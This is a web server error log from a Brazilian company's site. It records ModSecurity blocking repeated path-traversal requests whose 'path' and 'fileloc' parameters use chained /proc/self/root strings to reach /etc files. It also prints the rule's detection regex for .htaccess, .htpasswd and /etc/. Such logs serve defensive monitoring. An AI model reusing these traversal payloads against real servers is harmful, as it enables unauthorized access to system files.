[Fri Mar 20 12:34:55.880412 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:60110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pHwF0L0L-SsrnPo6iyQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:00.608028 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:60112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pJPHIg5MgXLBnicMvIwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:04.251453 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 57.141.18.57:56344] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:35:04.357252 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:50264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pKLninkcc-iUj5AqV8gAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:06.175435 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:50268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pKrninkcc-iUj5AqV9AAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:35:08.770133 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:50278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pLOoXxyEfFpUF8f-6hwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:35:11.112957 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:52514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pL_qxLDW4GITHUkQmiwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:12.419305 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:52516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pMNa6ubjKNq_cu4YY2wAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:35:16.802197 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:57298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:35:16.976048 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:52520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pNLninkcc-iUj5AqWBQAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:18.501820 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.103:57510] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pNuoXxyEfFpUF8f-6lQAAAUk"]
[Fri Mar 20 12:35:19.320553 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.38:57498] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pN-oXxyEfFpUF8f-6lgAAAUY"]
[Fri Mar 20 12:35:21.457798 2026] [mime_magic:error] [pid 9818:tid 140411691570944] (70014)End of file found: [client 57.141.18.63:57720] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:35:23.781915 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:52526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pO9a6ubjKNq_cu4YY8gAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:30.077851 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:58320] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:35:30.087942 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:38076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pQgF0L0L-SsrnPo6i7wAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:31.577634 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.109:58416] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pQxCii7xarUs8iHamFwAAAhQ"]
[Fri Mar 20 12:35:31.795572 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.118:58432] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1pQzJ3M9BSuKP7CAZlsAAAAI8"]
[Fri Mar 20 12:35:33.704930 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:57226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pRV1pVZ5mVmJwsFNpXQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:35.019119 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:57240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pR_qxLDW4GITHUkQmtwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:35:38.576215 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:57240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pSvqxLDW4GITHUkQmwAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:35:41.536204 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:49494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pTRCii7xarUs8iHamMQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:35:44.990025 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:49508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pUF1pVZ5mVmJwsFNpbAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:45.093841 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 74.7.241.31:41032] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib
[Fri Mar 20 12:35:46.305313 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:49514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pUuoXxyEfFpUF8f-6vQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:35:48.563251 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:55308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pVOoXxyEfFpUF8f-6wgAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
